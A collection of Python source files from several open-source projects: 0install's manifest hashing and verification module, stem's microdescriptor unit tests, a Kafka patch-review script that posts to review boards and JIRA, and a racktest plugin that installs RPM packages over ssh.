that two trees will generate identical manifest strings if and only if:
- They have exactly the same set of files, directories and symlinks.
- For each pair of corresponding directories in the two sets:
- The mtimes are the same (OldSHA1 only).
- For each pair of corresponding files in the two sets:
- The size, executable flag and mtime are the same.
- The contents have matching secure hash values.
- For each pair of corresponding symlinks in the two sets:
- The mtime and size are the same.
- The targets have matching secure hash values.
The manifest is typically processed with a secure hash itself. So, the idea is that
any significant change to the contents of the tree will change the secure hash value
of the manifest.
A top-level ".manifest" file is ignored.
"""
# Copyright (C) 2009, Thomas Leonard
# See the README file for details, or visit http://0install.net.
import os, stat, base64
from zeroinstall import SafeException, _, logger
from zeroinstall.zerostore import BadDigest, parse_algorithm_digest_pair, format_algorithm_digest_pair
import hashlib
sha1_new = hashlib.sha1
class Algorithm:
"""Abstract base class for algorithms.
An algorithm knows how to generate a manifest from a directory tree.
@ivar rating: how much we like this algorithm (higher is better)
@type rating: int
"""
def generate_manifest(self, root):
"""Returns an iterator that yields each line of the manifest for the directory
tree rooted at 'root'."""
raise Exception('Abstract')
def new_digest(self):
"""Create a new digest. Call update() on the returned object to digest the data.
Call getID() to turn it into a full ID string."""
raise Exception('Abstract')
def getID(self, digest):
"""Convert a digest (from new_digest) to a full ID."""
raise Exception('Abstract')
class OldSHA1(Algorithm):
"""@deprecated: Injector versions before 0.20 only supported this algorithm."""
rating = 10
def generate_manifest(self, root):
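        # Each yielded line describes one entry (formats taken from the yields below):
        #   "D <mtime> <path>" for directories, "F <sha1> <mtime> <size> <name>" for files,
        #   "X <sha1> <mtime> <size> <name>" for executables, "S <sha1> <size> <name>" for symlinks.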
def recurse(sub):
# To ensure that a line-by-line comparison of the manifests
# is possible, we require that filenames don't contain newlines.
# Otherwise, you can name a file so that the part after the \n
# would be interpreted as another line in the manifest.
if '\n' in sub: raise BadDigest("Newline in filename '%s'" % sub)
assert sub.startswith('/')
if sub == '/.manifest': return
full = os.path.join(root, sub[1:].replace('/', os.sep))
info = os.lstat(full)
m = info.st_mode
if stat.S_ISDIR(m):
if sub != '/':
yield "D %s %s" % (int(info.st_mtime), sub)
items = os.listdir(full)
items.sort()
subdir = sub
if not subdir.endswith('/'):
subdir += '/'
for x in items:
for y in recurse(subdir + x):
yield y
return
assert sub[1:]
leaf = os.path.basename(sub[1:])
if stat.S_ISREG(m):
with open(full, 'rb') as stream:
d = sha1_new(stream.read()).hexdigest() # XXX could be very large!
if m & 0o111:
yield "X %s %s %s %s" % (d, int(info.st_mtime), info.st_size, leaf)
else:
yield "F %s %s %s %s" % (d, int(info.st_mtime), info.st_size, leaf)
elif stat.S_ISLNK(m):
target = os.readlink(full).encode('utf-8')
d = sha1_new(target).hexdigest()
# Note: Can't use utime on symlinks, so skip mtime
# Note: eCryptfs may report length as zero, so count ourselves instead
yield "S %s %s %s" % (d, len(target), leaf)
else:
raise SafeException(_("Unknown object '%s' (not a file, directory or symlink)") %
full)
for x in recurse('/'): yield x
def new_digest(self):
return sha1_new()
def getID(self, digest):
return 'sha1=' + digest.hexdigest()
def get_algorithm(name):
"""Look-up an L{Algorithm} by name.
@raise BadDigest: if the name is unknown."""
try:
return algorithms[name]
except KeyError:
raise BadDigest(_("Unknown algorithm '%s'") % name)
def generate_manifest(root, alg = 'sha1'):
"""@deprecated: use L{get_algorithm} and L{Algorithm.generate_manifest} instead."""
return get_algorithm(alg).generate_manifest(root)
def add_manifest_file(dir, digest_or_alg):
"""Writes a .manifest file into 'dir', and returns the digest.
You should call fixup_permissions before this to ensure that the permissions are correct.
On exit, dir itself has mode 555. Subdirectories are not changed.
@param dir: root of the implementation
@param digest_or_alg: should be an instance of Algorithm. Passing a digest
here is deprecated."""
mfile = os.path.join(dir, '.manifest')
if os.path.islink(mfile) or os.path.exists(mfile):
raise SafeException(_("Directory '%s' already contains a .manifest file!") % dir)
manifest = ''
if isinstance(digest_or_alg, Algorithm):
alg = digest_or_alg
digest = alg.new_digest()
else:
digest = digest_or_alg
alg = get_algorithm('sha1')
for line in alg.generate_manifest(dir):
manifest += line + '\n'
manifest = manifest.encode('utf-8')
digest.update(manifest)
os.chmod(dir, 0o755)
with open(mfile, 'wb') as stream:
os.chmod(dir, 0o555)
stream.write(manifest)
os.chmod(mfile, 0o444)
return digest
def splitID(id):
"""Take an ID in the form 'alg=value' and return a tuple (alg, value),
where 'alg' is an instance of Algorithm and 'value' is a string.
@raise BadDigest: if the algorithm isn't known or the ID has the wrong format."""
alg, digest = parse_algorithm_digest_pair(id)
return (get_algorithm(alg), digest)
def copy_with_verify(src, dest, mode, alg, required_digest):
"""Copy path src to dest, checking that the contents give the right digest.
dest must not exist. New file is created with a mode of 'mode & umask'.
@param src: source filename
@type src: str
@param dest: target filename
@type dest: str
@param mode: target mode
@type mode: int
@param alg: algorithm to generate digest
@type alg: L{Algorithm}
@param required_digest: expected digest value
@type required_digest: str
@raise BadDigest: the contents of the file don't match required_digest"""
with open(src, 'rb') as src_obj:
dest_fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, mode)
try:
digest = alg.new_digest()
while True:
data = src_obj.read(256)
if not data: break
digest.update(data)
while data:
written = os.write(dest_fd, data)
assert written >= 0
data = data[written:]
finally:
os.close(dest_fd)
actual = digest.hexdigest()
if actual == required_digest: return
os.unlink(dest)
raise BadDigest(_("Copy failed: file '%(src)s' has wrong digest (may have been tampered with)\n"
"Expected: %(required_digest)s\n"
"Actual: %(actual_digest)s") % {'src': src, 'required_digest': required_digest, 'actual_digest': actual})
def verify(root, required_digest = None):
"""Ensure that directory 'dir' generates the given digest.
For a non-error return:
- Dir's name must be a digest (in the form "alg=value")
- The calculated digest of the contents must match this name.
- If there is a .manifest file, then its digest must also match.
@raise BadDigest: if verification fails."""
if required_digest is None:
required_digest = os.path.basename(root)
alg = splitID(required_digest)[0]
digest = alg.new_digest()
lines = []
for line in alg.generate_manifest(root):
line += '\n'
digest.update(line.encode('utf-8'))
lines.append(line)
actual_digest = alg.getID(digest)
manifest_file = os.path.join(root, '.manifest')
if os.path.isfile(manifest_file):
digest = alg.new_digest()
with open(manifest_file, 'rb') as stream:
digest.update(stream.read())
manifest_digest = alg.getID(digest)
else:
manifest_digest = None
if required_digest == actual_digest == manifest_digest:
return
error = BadDigest(_("Cached item does NOT verify."))
error.detail = _(" Expected: %(required_digest)s\n"
" Actual: %(actual_digest)s\n"
".manifest digest: %(manifest_digest)s\n\n") \
% {'required_digest': required_digest, 'actual_digest': actual_digest, 'manifest_digest': manifest_digest or _('No .manifest file')}
if manifest_digest is None:
error.detail += _("No .manifest, so no further details available.")
elif manifest_digest == actual_digest:
error.detail += _("The .manifest file matches the actual contents. Very strange!")
elif manifest_digest == required_digest:
import difflib
with open(manifest_file, 'rt') as stream:
diff = difflib.unified_diff(stream.readlines(), lines,
'Recorded', 'Actual')
error.detail += _("The .manifest file matches the directory name.\n" \
"The contents of the directory have changed:\n") + \
''.join(diff)
elif required_digest == actual_digest:
error.detail += _("The directory contents are correct, but the .manifest file is wrong!")
else:
error.detail += _("The .manifest file matches neither of the other digests. Odd.")
raise error
# XXX: Be more careful about the source tree changing under us. In particular, what happens if:
# - A regular file suddenly turns into a symlink?
# - We find a device file (users can hard-link them if on the same device)
def copy_tree_with_verify(source, target, manifest_data, required_digest):
"""Copy directory source to be a subdirectory of target if it matches the required_digest.
manifest_data is normally source/.manifest. source and manifest_data are not trusted
(will typically be under the control of another user).
The copy is first done to a temporary directory in target, then renamed to the final name
only if correct. Therefore, an invalid 'target/required_digest' will never exist.
A successful return means that target/required_digest now exists (whether we created it or not)."""
import tempfile
alg, digest_value = splitID(required_digest)
if isinstance(alg, OldSHA1):
raise SafeException(_("Sorry, the 'sha1' algorithm does not support copying."))
digest = alg.new_digest()
digest.update(manifest_data)
manifest_digest = alg.getID(digest)
if manifest_digest != required_digest:
raise BadDigest(_("Manifest has been tampered with!\n"
"Manifest digest: %(actual_digest)s\n"
"Directory name : %(required_digest)s")
% {'actual_digest': manifest_digest, 'required_digest': required_digest})
target_impl = os.path.join(target, required_digest)
if os.path.isdir(target_impl):
logger.info(_("Target directory '%s' already exists"), target_impl)
return
# We've checked that the source's manifest matches required_digest, so it
# is what we want. Make a list of all the files we need to copy...
wanted = _parse_manifest(manifest_data.decode('utf-8'))
tmpdir = tempfile.mkdtemp(prefix = 'tmp-copy-', dir = target)
try:
_copy_files(alg, wanted, source, tmpdir)
if wanted:
raise SafeException(_('Copy failed; files missing from source:') + '\n- ' +
'\n- '.join(wanted.keys()))
# Make directories read-only (files are already RO)
for root, dirs, files in os.walk(tmpdir):
for d in dirs:
path = os.path.join(root, d)
mode = os.stat(path).st_mode
os.chmod(path, mode & 0o555)
# Check that the copy is correct
actual_digest = alg.getID(add_manifest_file(tmpdir, alg))
if actual_digest != required_digest:
raise SafeException(_("Copy failed; double-check of target gave the wrong digest.\n"
"Unless the target was modified during the copy, this is a BUG\n"
"in 0store and should be reported.\n"
"Expected: %(required_digest)s\n"
"Actual: %(actual_digest)s") % {'required_digest': required_digest, 'actual_digest': actual_digest})
try:
os.chmod(tmpdir, 0o755) # need write permission to rename on MacOS X
os.rename(tmpdir, target_impl)
os.chmod(target_impl, 0o555)
tmpdir = None
except OSError:
if not os.path.isdir(target_impl):
raise
# else someone else installed it already - return success
finally:
if tmpdir is not None:
logger.info(_("Deleting tmpdir '%s'") % tmpdir)
from zeroinstall.support import ro_rmtree
ro_rmtree(tmpdir)
def _parse_manifest(manifest_data):
"""Parse a manifest file.
@param manifest_data: the contents of the manifest file
@type manifest_data: str
@return: a mapping from paths to information about that path
@rtype: {str: tuple}"""
wanted = {}
dir = ''
for line in manifest_data.split('\n'):
if not line: break
if line[0] == 'D':
data = line.split(' ', 1)
if len(data) != 2: raise BadDigest(_("Bad line '%s'") % line)
path = data[-1]
if not path.startswith('/'): raise BadDigest(_("Not absolute: '%s'") % line)
path = path[1:]
dir = path
elif line[0] == 'S':
data = line.split(' ', 3)
path = os.path.join(dir, data[-1])
if len(data) != 4: raise BadDigest(_("Bad line '%s'") % line)
else:
data = line.split(' ', 4)
path = os.path.join(dir, data[-1])
if len(data) != 5: raise BadDigest(_("Bad line '%s'") % line)
if path in wanted:
raise BadDigest(_('Duplicate entry "%s"') % line)
wanted[path] = data[:-1]
return wanted
def _copy_files(alg, wanted, source, target):
"""Scan for files under 'source'. For each one:
If it is in wanted and has the right details (or they can be fixed; e.g. mtime),
then copy it into 'target'.
If it's not in wanted, warn and skip it.
On exit, wanted contains only files that were not found."""
dir = ''
for line in alg.generate_manifest(source):
if line[0] == 'D':
type, name = line.split(' ', 1)
assert name.startswith('/')
dir = name[1:]
path = dir
elif line[0] == 'S':
type, actual_digest, actual_size, name = line.split(' ', 3)
path = os.path.join(dir, name)
else:
assert line[0] in 'XF'
type, actual_digest, actual_mtime, actual_size, name = line.split(' ', 4)
path = os.path.join(dir, name)
try:
required_details = wanted.pop(path)
except KeyError:
logger.warn(_("Skipping file not in manifest: '%s'"), path)
continue
if required_details[0] != type:
raise BadDigest(_("Item '%s' has wrong type!") % path)
if type == 'D':
os.mkdir(os.path.join(target, path))
elif type in 'XF':
required_type, required_digest, required_mtime, required_size = required_details
if required_size != actual_size:
raise SafeException(_("File '%(path)s' has wrong size (%(actual_size)s bytes, but should be "
"%(required_size)s according to manifest)") %
{'path': path, 'actual_size': actual_size, 'required_size': required_size})
required_mtime = int(required_mtime)
dest_path = os.path.join(target, path)
if type == 'X':
mode = 0o555
else:
mode = 0o444
copy_with_verify(os.path.join(source, path),
dest_path,
mode,
alg,
required_digest)
os.utime(dest_path, (required_mtime, required_mtime))
elif type == 'S':
required_type, required_digest, required_size = required_details
if required_size != actual_size:
raise SafeException(_("Symlink '%(path)s' has wrong size (%(actual_size)s bytes, but should be "
"%(required_size)s according to manifest)") %
{'path': path, 'actual_size': actual_size, 'required_size': required_size})
symlink_target = os.readlink(os.path.join(source, path))
symlink_digest = alg.new_digest()
symlink_digest.update(symlink_target.encode('utf-8'))
if symlink_digest.hexdigest() != required_digest:
raise SafeException(_("Symlink '%(path)s' has wrong target (digest should be "
"%(digest)s according to manifest)") % {'path': path, 'digest': required_digest})
dest_path = os.path.join(target, path)
os.symlink(symlink_target, dest_path)
else:
raise SafeException(_("Unknown manifest type %(type)s for '%(path)s'") % {'type': type, 'path': path})
class HashLibAlgorithm(Algorithm):
new_digest = None # Constructor for digest objects
def __init__(self, name, rating, hash_name = None):
self.name = name
self.new_digest = getattr(hashlib, hash_name or name)
self.rating = rating
def generate_manifest(self, root):
def recurse(sub):
# To ensure that a line-by-line comparison of the manifests
# is possible, we require that filenames don't contain newlines.
# Otherwise, you can name a file so that the part after the \n
# would be interpreted as another line in the manifest.
if '\n' in sub: raise BadDigest(_("Newline in filename '%s'") % sub)
assert sub.startswith('/')
full = os.path.join(root, sub[1:])
info = os.lstat(full)
new_digest = self.new_digest
m = info.st_mode
if not stat.S_ISDIR(m): raise Exception(_('Not a directory: "%s"') % full)
if sub != '/':
yield "D %s" % sub
items = os.listdir(full)
items.sort()
dirs = []
for leaf in items:
path = os.path.join(root, sub[1:], leaf)
info = os.lstat(path)
m = info.st_mode
if stat.S_ISREG(m):
if leaf == '.manifest': continue
with open(path, 'rb') as stream:
d = new_digest(stream.read()).hexdigest()
if m & 0o111:
yield "X %s %s %s %s" % (d, int(info.st_mtime), info.st_size, leaf)
else:
yield "F %s %s %s %s" % (d, int(info.st_mtime), info.st_size, leaf)
elif stat.S_ISLNK(m):
target = os.readlink(path).encode('utf-8')
d = new_digest(target).hexdigest()
# Note: Can't use utime on symlinks, so skip mtime
# Note: eCryptfs may report length as zero, so count ourselves instead
yield "S %s %s %s" % (d, len(target), leaf)
elif stat.S_ISDIR(m):
dirs.append(leaf)
else:
raise SafeException(_("Unknown object '%s' (not a file, directory or symlink)") %
path)
if not sub.endswith('/'):
sub += '/'
for x in dirs:
# Note: "sub" is always Unix style. Don't use os.path.join here.
for y in recurse(sub + x): yield y
return
for x in recurse('/'): yield x
def getID(self, digest):
if self.name in ('sha1new', 'sha256'):
digest_str = digest.hexdigest()
else:
# Base32-encode newer algorithms to make the digest shorter.
# We can't use base64 as Windows is case insensitive.
# There's no need for padding (and = characters in paths cause problems for some software).
digest_str = base64.b32encode(digest.digest()).rstrip(b'=').decode('ascii')
return format_algorithm_digest_pair(self.name, digest_str)
algorithms = {
'sha1': OldSHA1(),
'sha1new': HashLibAlgorithm('sha1new', 50, 'sha1'),
'sha256': HashLibAlgorithm('sha256', 80),
'sha256new': HashLibAlgorithm('sha256new', 90, 'sha256'),
}
def fixup_permissions(root):
"""Set permissions recursively for children of root:
- If any X bit is set, they all must be.
- World readable, non-writable.
@raise Exception: if there are unsafe special bits set (setuid, etc)."""
for main, dirs, files in os.walk(root):
for x in ['.'] + files:
full = os.path.join(main, x)
raw_mode = os.lstat(full).st_mode
if stat.S_ISLNK(raw_mode): continue
mode = stat.S_IMODE(raw_mode)
if mode & ~0o777:
raise Exception(_("Unsafe mode: extracted file '%(filename)s' had special bits set in mode '%(mode)s'") % {'filename': full, 'mode': oct(mode)})
if mode & 0o111:
os.chmod(full, 0o555)
else:
os.chmod(full, 0o444)
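The pieces above combine in a predictable way: a store digest for a directory tree is the hash of that tree's manifest lines. The following is only a minimal sketch of that combination, assuming this module's algorithms registry is in scope and that each manifest line is newline-terminated before hashing:

    def sketch_directory_digest(root, alg_name='sha256new'):
        # Pick an algorithm from the registry defined above.
        alg = algorithms[alg_name]
        digest = alg.new_digest()
        # Hash the manifest text itself, one newline-terminated line at a time.
        for line in alg.generate_manifest(root):
            digest.update((line + '\n').encode('utf-8'))
        # Returns e.g. 'sha256new_<base32>' via getID() above.
        return alg.getID(digest)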
| timdiels/0install | zeroinstall/zerostore/manifest.py | Python | lgpl-2.1 | 19,123 |
"""
Unit tests for stem.descriptor.microdescriptor.
"""
import unittest
import stem.exit_policy
import stem.descriptor
from stem import str_type
from stem.descriptor.microdescriptor import Microdescriptor
from test.mocking import (
get_microdescriptor,
CRYPTO_BLOB,
)
from test.unit.descriptor import get_resource
FIRST_ONION_KEY = """\
-----BEGIN RSA PUBLIC KEY-----
MIGJAoGBAMhPQtZPaxP3ukybV5LfofKQr20/ljpRk0e9IlGWWMSTkfVvBcHsa6IM
H2KE6s4uuPHp7FqhakXAzJbODobnPHY8l1E4efyrqMQZXEQk2IMhgSNtG6YqUrVF
CxdSKSSy0mmcBe2TOyQsahlGZ9Pudxfnrey7KcfqnArEOqNH09RpAgMBAAE=
-----END RSA PUBLIC KEY-----\
"""
SECOND_ONION_KEY = """\
-----BEGIN RSA PUBLIC KEY-----
MIGJAoGBALCOxZdpMI2WO496njSQ2M7b4IgAGATqpJmH3So7lXOa25sK6o7JipgP
qQE83K/t/xsMIpxQ/hHkft3G78HkeXXFc9lVUzH0HmHwYEu0M+PMVULSkG36MfEl
7WeSZzaG+Tlnh9OySAzVyTsv1ZJsTQFHH9V8wuM0GOMo9X8DFC+NAgMBAAE=
-----END RSA PUBLIC KEY-----\
"""
THIRD_ONION_KEY = """\
-----BEGIN RSA PUBLIC KEY-----
MIGJAoGBAOWFQHxO+5kGuhwPUX5jB7wJCrTbSU0fZwolNV1t9UaDdjGDvIjIhdit
y2sMbyd9K8lbQO7x9rQjNst5ZicuaSOs854XQddSjm++vMdjYbOcVMqnKGSztvpd
w/1LVWFfhcBnsGi4JMGbmP+KUZG9A8kI9deSyJhfi35jA7UepiHHAgMBAAE=
-----END RSA PUBLIC KEY-----\
"""
class TestMicrodescriptor(unittest.TestCase):
def test_local_microdescriptors(self):
"""
Checks a small microdescriptor file with known contents.
"""
descriptor_path = get_resource('cached-microdescs')
with open(descriptor_path, 'rb') as descriptor_file:
descriptors = stem.descriptor.parse_file(descriptor_file, 'microdescriptor 1.0')
router = next(descriptors)
self.assertEqual(FIRST_ONION_KEY, router.onion_key)
self.assertEqual(None, router.ntor_onion_key)
self.assertEqual([], router.or_addresses)
self.assertEqual([], router.family)
self.assertEqual(stem.exit_policy.MicroExitPolicy('reject 1-65535'), router.exit_policy)
self.assertEqual({b'@last-listed': b'2013-02-24 00:18:36'}, router.get_annotations())
self.assertEqual([b'@last-listed 2013-02-24 00:18:36'], router.get_annotation_lines())
router = next(descriptors)
self.assertEqual(SECOND_ONION_KEY, router.onion_key)
self.assertEqual(str_type('r5572HzD+PMPBbXlZwBhsm6YEbxnYgis8vhZ1jmdI2k='), router.ntor_onion_key)
self.assertEqual([], router.or_addresses)
self.assertEqual(['$6141629FA0D15A6AEAEF3A1BEB76E64C767B3174'], router.family)
self.assertEqual(stem.exit_policy.MicroExitPolicy('reject 1-65535'), router.exit_policy)
self.assertEqual({b'@last-listed': b'2013-02-24 00:18:37'}, router.get_annotations())
self.assertEqual([b'@last-listed 2013-02-24 00:18:37'], router.get_annotation_lines())
router = next(descriptors)
self.assertEqual(THIRD_ONION_KEY, router.onion_key)
self.assertEqual(None, router.ntor_onion_key)
self.assertEqual([(str_type('2001:6b0:7:125::242'), 9001, True)], router.or_addresses)
self.assertEqual([], router.family)
self.assertEqual(stem.exit_policy.MicroExitPolicy('accept 80,443'), router.exit_policy)
self.assertEqual({b'@last-listed': b'2013-02-24 00:18:36'}, router.get_annotations())
self.assertEqual([b'@last-listed 2013-02-24 00:18:36'], router.get_annotation_lines())
def test_minimal_microdescriptor(self):
"""
Basic sanity check that we can parse a microdescriptor with minimal
attributes.
"""
desc = get_microdescriptor()
self.assertTrue(CRYPTO_BLOB in desc.onion_key)
self.assertEqual(None, desc.ntor_onion_key)
self.assertEqual([], desc.or_addresses)
self.assertEqual([], desc.family)
self.assertEqual(stem.exit_policy.MicroExitPolicy('reject 1-65535'), desc.exit_policy)
self.assertEqual(None, desc.exit_policy_v6)
self.assertEqual(None, desc.identifier_type)
self.assertEqual(None, desc.identifier)
self.assertEqual([], desc.get_unrecognized_lines())
def test_unrecognized_line(self):
"""
Includes unrecognized content in the descriptor.
"""
desc = get_microdescriptor({'pepperjack': 'is oh so tasty!'})
self.assertEqual(['pepperjack is oh so tasty!'], desc.get_unrecognized_lines())
def test_proceeding_line(self):
"""
Includes a line prior to the 'onion-key' entry.
"""
desc_text = b'family Amunet1\n' + get_microdescriptor(content = True)
self.assertRaises(ValueError, Microdescriptor, desc_text)
desc = Microdescriptor(desc_text, validate = False)
self.assertEqual(['Amunet1'], desc.family)
def test_a_line(self):
"""
Sanity test with both an IPv4 and IPv6 address.
"""
desc_text = get_microdescriptor(content = True)
desc_text += b'\na 10.45.227.253:9001'
desc_text += b'\na [fd9f:2e19:3bcf::02:9970]:9001'
expected = [
('10.45.227.253', 9001, False),
('fd9f:2e19:3bcf::02:9970', 9001, True),
]
desc = Microdescriptor(desc_text)
self.assertEqual(expected, desc.or_addresses)
def test_family(self):
"""
Check the family line.
"""
desc = get_microdescriptor({'family': 'Amunet1 Amunet2 Amunet3'})
self.assertEqual(['Amunet1', 'Amunet2', 'Amunet3'], desc.family)
# try multiple family lines
desc_text = get_microdescriptor(content = True)
desc_text += b'\nfamily Amunet1'
desc_text += b'\nfamily Amunet2'
self.assertRaises(ValueError, Microdescriptor, desc_text)
# family entries will overwrite each other
desc = Microdescriptor(desc_text, validate = False)
self.assertEqual(1, len(desc.family))
def test_exit_policy(self):
"""
Basic check for 'p' lines. The router status entries contain an identical
field so we're not investing much effort here.
"""
desc = get_microdescriptor({'p': 'accept 80,110,143,443'})
self.assertEqual(stem.exit_policy.MicroExitPolicy('accept 80,110,143,443'), desc.exit_policy)
def test_identifier(self):
"""
Basic check for 'id' lines.
"""
desc = get_microdescriptor({'id': 'rsa1024 Cd47okjCHD83YGzThGBDptXs9Z4'})
self.assertEqual('rsa1024', desc.identifier_type)
self.assertEqual('Cd47okjCHD83YGzThGBDptXs9Z4', desc.identifier)
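As a quick illustration of the API these tests exercise, a microdescriptor can also be constructed directly from raw bytes, just as get_microdescriptor(content = True) does above. This is only a sketch; the descriptor text is illustrative, not real router data:

    from stem.descriptor.microdescriptor import Microdescriptor

    raw = (b'onion-key\n'
           b'-----BEGIN RSA PUBLIC KEY-----\n'
           b'...\n'
           b'-----END RSA PUBLIC KEY-----\n'
           b'p accept 80,443\n')
    desc = Microdescriptor(raw, validate = False)  # validate = False tolerates the elided key
    print(desc.exit_policy)                        # expected: accept 80,443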
| lokeshh/stem | test/unit/descriptor/microdescriptor.py | Python | lgpl-3.0 | 6,106 |
#!/usr/bin/env python
import argparse
import sys
import os
import time
import datetime
import tempfile
import commands
import getpass
from jira.client import JIRA
def get_jira_config():
# read the config file
home=jira_home=os.getenv('HOME')
home=home.rstrip('/')
if not (os.path.isfile(home + '/jira.ini')):
jira_user=raw_input('JIRA user :')
jira_pass=getpass.getpass('JIRA password :')
jira_config = {'user':jira_user, 'password':jira_pass}
return jira_config
else:
jira_config = dict(line.strip().split('=') for line in open(home + '/jira.ini'))
return jira_config
def get_jira(jira_config):
options = {
'server': 'https://issues.apache.org/jira'
}
jira = JIRA(options=options,basic_auth=(jira_config['user'], jira_config['password']))
# (Force) verify the auth was really done
jira_session=jira.session()
if (jira_session is None):
raise Exception("Failed to login to the JIRA instance")
return jira
def cmd_exists(cmd):
status, result = commands.getstatusoutput(cmd)
return status
def main():
''' main(), shut up, pylint '''
popt = argparse.ArgumentParser(description='Kafka patch review tool')
popt.add_argument('-b', '--branch', action='store', dest='branch', required=True, help='Tracking branch to create diff against')
popt.add_argument('-j', '--jira', action='store', dest='jira', required=True, help='JIRA corresponding to the reviewboard')
popt.add_argument('-s', '--summary', action='store', dest='summary', required=False, help='Summary for the reviewboard')
popt.add_argument('-d', '--description', action='store', dest='description', required=False, help='Description for reviewboard')
popt.add_argument('-r', '--rb', action='store', dest='reviewboard', required=False, help='Review board that needs to be updated')
popt.add_argument('-t', '--testing-done', action='store', dest='testing', required=False, help='Text for the Testing Done section of the reviewboard')
popt.add_argument('-db', '--debug', action='store_true', required=False, help='Enable debug mode')
opt = popt.parse_args()
post_review_tool = None
if (cmd_exists("post-review") == 0):
post_review_tool = "post-review"
elif (cmd_exists("rbt") == 0):
post_review_tool = "rbt post"
else:
print "please install RBTools"
sys.exit(1)
patch_file=tempfile.gettempdir() + "/" + opt.jira + ".patch"
if opt.reviewboard:
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d_%H:%M:%S')
patch_file=tempfile.gettempdir() + "/" + opt.jira + '_' + st + '.patch'
# first check if rebase is needed
git_branch_hash="git rev-parse " + opt.branch
p_now=os.popen(git_branch_hash)
branch_now=p_now.read()
p_now.close()
git_common_ancestor="git merge-base " + opt.branch + " HEAD"
p_then=os.popen(git_common_ancestor)
branch_then=p_then.read()
p_then.close()
if branch_now != branch_then:
print 'ERROR: Your current working branch is from an older version of ' + opt.branch + '. Please rebase first by using git pull --rebase'
sys.exit(1)
git_configure_reviewboard="git config reviewboard.url https://reviews.apache.org"
print "Configuring reviewboard url to https://reviews.apache.org"
p=os.popen(git_configure_reviewboard)
p.close()
git_remote_update="git remote update"
print "Updating your remote branches to pull the latest changes"
p=os.popen(git_remote_update)
p.close()
# Get JIRA configuration and login to JIRA to ensure the credentials work, before publishing the patch to the review board
print "Verifying JIRA connection configurations"
try:
jira_config=get_jira_config()
jira=get_jira(jira_config)
except:
print "Failed to login to the JIRA instance", sys.exc_info()[0], sys.exc_info()[1]
sys.exit(1)
git_command="git format-patch " + opt.branch + " --stdout > " + patch_file
if opt.debug:
print git_command
p=os.popen(git_command)
p.close()
print 'Getting latest patch attached to the JIRA'
tmp_dir = tempfile.mkdtemp()
get_latest_patch_command="python ./dev-utils/test-patch.py --get-latest-patch --defect " + opt.jira + " --output " + tmp_dir + " > /dev/null 2>&1"
p=os.popen(get_latest_patch_command)
p.close()
previous_patch=tmp_dir + "/" + opt.jira + ".patch"
diff_file=tmp_dir + "/" + opt.jira + ".diff"
if os.path.isfile(previous_patch) and os.stat(previous_patch).st_size > 0:
print 'Creating diff with previous version of patch uploaded to JIRA'
diff_command = "diff " + previous_patch+ " " + patch_file + " > " + diff_file
try:
p=os.popen(diff_command)
sys.stdout.flush()
p.close()
except:
pass
print 'Diff with previous version of patch uploaded to JIRA is saved to ' + diff_file
    print 'Checking if there are changes that need to be pushed'
if os.stat(diff_file).st_size == 0:
print 'No changes found on top of changes uploaded to JIRA'
print 'Aborting'
sys.exit(1)
rb_command= post_review_tool + " --publish --tracking-branch " + opt.branch + " --target-groups=kafka --bugs-closed=" + opt.jira
if opt.debug:
rb_command=rb_command + " --debug"
summary="Patch for " + opt.jira
if opt.summary:
summary=opt.summary
rb_command=rb_command + " --summary \"" + summary + "\""
if opt.description:
rb_command=rb_command + " --description \"" + opt.description + "\""
if opt.reviewboard:
rb_command=rb_command + " -r " + opt.reviewboard
if opt.testing:
rb_command=rb_command + " --testing-done=" + opt.testing
if opt.debug:
print rb_command
p=os.popen(rb_command)
rb_url=""
for line in p:
print line
if line.startswith('http'):
rb_url = line
elif line.startswith("There don't seem to be any diffs"):
print 'ERROR: Your reviewboard was not created/updated since there was no diff to upload. The reasons that can cause this issue are 1) Your diff is not checked into your local branch. Please check in the diff to the local branch and retry 2) You are not specifying the local branch name as part of the --branch option. Please specify the remote branch name obtained from git branch -r'
p.close()
sys.exit(1)
elif line.startswith("Your review request still exists, but the diff is not attached") and not opt.debug:
print 'ERROR: Your reviewboard was not created/updated. Please run the script with the --debug option to troubleshoot the problem'
p.close()
sys.exit(1)
if p.close() != None:
print 'ERROR: reviewboard update failed. Exiting.'
sys.exit(1)
if opt.debug:
print 'rb url=',rb_url
print 'Creating diff against', opt.branch, 'and uploading patch to JIRA',opt.jira
issue = jira.issue(opt.jira)
attachment=open(patch_file)
jira.add_attachment(issue,attachment)
attachment.close()
comment="Created reviewboard "
if not opt.reviewboard:
print 'Created a new reviewboard',rb_url,
else:
print 'Updated reviewboard',rb_url
comment="Updated reviewboard "
comment = comment + rb_url + ' against branch ' + opt.branch
jira.add_comment(opt.jira, comment)
#update the JIRA status to PATCH AVAILABLE
transitions = jira.transitions(issue)
transitionsMap ={}
for t in transitions:
transitionsMap[t['name']] = t['id']
if('Submit Patch' in transitionsMap):
jira.transition_issue(issue, transitionsMap['Submit Patch'] , assignee={'name': jira_config['user']} )
if __name__ == '__main__':
sys.exit(main())
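For reference, get_jira_config() above expects an optional ~/jira.ini with one key=value pair per line. A minimal sketch of that parsing follows; the user and password values are made up for illustration:

    example_ini = "user=jdoe\npassword=not-a-real-password\n"
    jira_config = dict(line.strip().split('=') for line in example_ini.splitlines() if line.strip())
    assert jira_config == {'user': 'jdoe', 'password': 'not-a-real-password'}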
| confluentinc/kafka-deprecated-fork | kafka-patch-review.py | Python | apache-2.0 | 7,486 |
from strato.racktest.hostundertest import plugins
import os
import time
import socket
class RPM:
def __init__(self, host):
self._host = host
def installRPMPackage(self, path):
basename = os.path.basename(path)
self._host.ssh.ftp.putFile(basename, path)
self._retryInstallPackageSinceAtBootTimeMightBeLocked(basename)
def yumInstall(self, packageList):
if isinstance(packageList, str):
packageList = [packageList]
self._host.ssh.run.script("yum install %s --assumeyes" % (" ".join(packageList)))
def makeYUMCachePointToTestRunner(self):
ip = self._myIPForHost()
self._host.ssh.run.script("sed -i 's/127.0.0.1/%s/' /etc/yum.conf" % ip)
def _retryInstallPackageSinceAtBootTimeMightBeLocked(self, basename):
RETRIES = 20
for i in xrange(RETRIES):
try:
self._host.ssh.run.script("rpm -i --force ./%s" % basename)
return
except Exception as e:
if i < RETRIES - 1 and 'yum status database is locked by another process' in str(e):
time.sleep(0.5)
continue
raise
def _myIPForHost(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect((self._host.node.ipAddress(), 1))
return s.getsockname()[0]
finally:
s.close()
